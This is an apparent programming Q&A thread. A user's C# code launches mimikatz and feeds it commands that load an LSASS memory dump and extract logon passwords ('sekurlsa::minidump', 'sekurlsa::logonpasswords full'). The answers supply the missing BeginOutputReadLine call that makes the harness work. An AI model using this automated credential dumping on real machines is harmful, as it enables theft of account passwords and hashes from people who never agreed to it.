# run and use mimikatz in C#

Tags: c#

I want to run and use mimikatz in c# and run some commands after last one finished but i dont see any output from mimikatz
{No output is observed}
Thanks & Regards

```
 Process cmd = new Process();
        string[] commands = new string[] { "sekurlsa::minidump lsass.DMP", "log", "sekurlsa::logonpasswords full","exit" };
        int c = 0;
        cmd.StartInfo.FileName = "D:\\Program\\Mimikatz\\x64\\mimikatz.exe";
        cmd.StartInfo.RedirectStandardInput = true;
        cmd.StartInfo.RedirectStandardOutput = true;
        cmd.StartInfo.CreateNoWindow = true;
        cmd.StartInfo.UseShellExecute = false;
        cmd.OutputDataReceived += (s, e) =>
        {
            Console.WriteLine(e.Data);
            if (e.Data== "mimikatz #")
            {
                cmd.StandardInput.WriteLine(commands[c++]);
            }
        };
        cmd.Start();
        cmd.StandardInput.WriteLine("privilege::debug");
        Console.ReadLine();
```

Comment: Does this answer your question? [ProcessInfo and RedirectStandardOutput](https://stackoverflow.com/questions/1145969/processinfo-and-redirectstandardoutput)

Answer (score 0):

If you call `cmd.BeginOutputReadLine();` after `cmd.Start()` your OutputDataReceived method will be called.

Answer (score 0):

See [Process.OutputDataReceived Event manuel](https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.outputdatareceived?view=net-5.0), the code you provided miss a call to the `BeginOutputReadLine` method.